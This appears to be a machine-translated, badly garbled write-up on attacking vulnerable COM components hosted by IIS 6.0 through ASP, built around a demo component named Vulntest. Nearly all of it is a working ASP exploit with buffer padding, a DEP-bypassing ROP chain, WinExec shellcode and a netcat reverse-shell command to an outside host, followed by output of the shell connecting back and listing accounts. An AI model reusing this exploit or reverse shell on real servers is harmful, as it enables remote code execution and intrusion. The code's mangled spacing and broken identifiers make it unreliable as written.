Attack COM components in ASP

In fact, many COM components not only attack IE clients. When the server registers a vulnerable COM component, ASP can be used as a container for IIS servers that support ASP to launch attacks on these components to break through the deletion of many components, the bottleneck of command execution failure. Because the fault tolerance Processing of IIS does not affect the running of IIS, you can use WinExec to execute commands freely. Demo: vulnerability component Vulntest. vun has a simple stack overflow vulnerability. The vulnerability principle and basic stack overflow are exploited by the Windows SP2 Simplified Chinese version (x86) + IIS6.0ASP attack code example: <% FunctionPadding (intLen) DimstrRet, intSizeintSize = intLen/2-1For I = 0 To intSize Step 1 strRet = strRet & unescape ("% u4141") NextPadding = strRetEndFunction FunctionPackDWORD (strPoint) strTmp = replace (strPoint, "0x", "") PackDWORD = PackDWORD & UnEscape ("% u" & Mid (strTmp, 5, 2) & Mid (strTmp, 7, 2) PackDWORD = PackDWORD & UnEscape ("% u" & Mid (strTmp, 1, 2) & Mid (strTmp, 3, 2) EndFunction FunctionPackList (arrList) forEach Item In arrListPackList = PackList & PackDWORD (Item) NextEndFunction FunctionPackShellcode (strCode) intLen = Len (strCode) /4 IfintLen Mod 2 = 1 ThenstrCode = strCode & "\ x90" intLen = intLen + 1 EndIfarrTmp = Split (strCode, "\ x") For I = 1 To UBound (arrTmp) step 2 PackShellcode = PackShellcode & UnEsca Pe ("% u" & arrTmp (I + 1) & arrTmp (I) NextEndFunction FunctionUnicodeToAscii (uStrIn) intLen = Len (strCommand) ifintLen Mod 2 = 1 ThenForI = 1 To intLen-1 Step 2 UnicodeToAscii = UnicodeToAscii & "% u" & Hex (Asc (Mid (strCommand, I + 1, 1 ))) & Hex (Asc (Mid (strCommand, I, 1) NextUnicodeToAscii = UnicodeToAscii & "% u00" & Hex (Asc (Mid (strCommand, I, 1 ))) elseForI = 1 To intLen-1 Step 2 UnicodeToAscii = UnicodeToAs Cii & "% u" & Hex (Asc (Mid (strCommand, I + 1, 1) & Hex (Asc (Mid (strCommand, I, 1 ))) nextEndIfUnicodeToAscii = UnEscape (UnicodeToAscii) endFunction ''' bypassDEP with [msvcrt. dll] v7.0.20.0.3959 (C: \ WINDOWS \ system32 \ msvcrt. dll) Rop_Chain = Array (_ "0x77bae04e", _ "0xffffffc0", _ "0x77b7c427", _ "0x77bb2266", _ "0x77bb2265", _ "0x77b7f641 ", _ "0x77baf392", _ "0xA2A6AE89", _ "0x77bafe37", _ "0x77baf392 ", _" 0x90909090 ", _" 0x77ba2033 ", _" 0x77bbf004 ", _" 0x77b9b06c ", _" 0x7c801fe3 ", _" 0x77bb6591 "_) ''' junkand ret addressJunk0 = Padding (52) ret_Addr = PackDWORD ("0x77bb2266") '# RETNJunk1 = Padding (8) '# because of "retn 8" ''' smallshellcode adjust espSmall_Shellcode = "\ x33 \ xc0 \ x66 \ xb8 \ x40 \ x02 \ x2b \ xe0" 'xoreax, EAX 'movax, 240 'subesp, EAX ''''''''''''''''''''''''''' ''Shellcodewinexec (win2k sp2) real_Shellcode = "\ xd9 \ xee \ x9b \ xd9 \ x74 \ x24 \ xf4 \ x5e \ x83 \ xc6 \ x1a \ x33 \ xc0 \ x50 \ x56 \ x68 \ x41 \ x41 \ x41 \ x41 \ x41 \ x68 \ x16 \ x41 \ x86 \ x7c \ xc3 "'d9ee fldz' 9B WAIT 'd97424f4 FSTENV (28-BYTE) ptr ss: [ESP-C] '5e pop esi '83C61a add esi, 1a '33c0 xor eax, EAX '50 push eax '56 push esi '68F1F8807C PUSH kernel32.ExitThread '681641867c PUSH kernel32.WinExec 'c3 RETN '''''''''''''''''''' '''''''''''' extends linestrcomm And = "C: \ Inetpub \ wwwroot \ nc.exe-e cmd.exe 192.168.194.1 8080 "'''''''''''''''''''''''''''' 'ploitvulntest. dllPayload = Junk0 & Ret_Addr & Junk1 & PackList (Rop_Chain) & PackShellcode (release) & PackShellcode (Real_Shellcode) & UnicodeToAscii (strCommand) Setobj = CreateObject ("Vulntest. test.1 ") obj. test result: connect to [192.168.194.1] From ACER-38787AC8AF [192.168.194.134] 1344 Microsoft Windows [version 5.2.3790] (C) Copyright 1985-2003Microsoft Corp. c: \ windows \ system32 \ inetsrv> whoamiwhoamintauthority \ network service c: \ windows \ system32 \ inetsrv> netusernetuser \ ACER-38787AC8AF user account Administrator Guest IUSR_ACER-38787AC8AFIWAM_ACER-38787AC8AF SQLDebugger command completed successfully.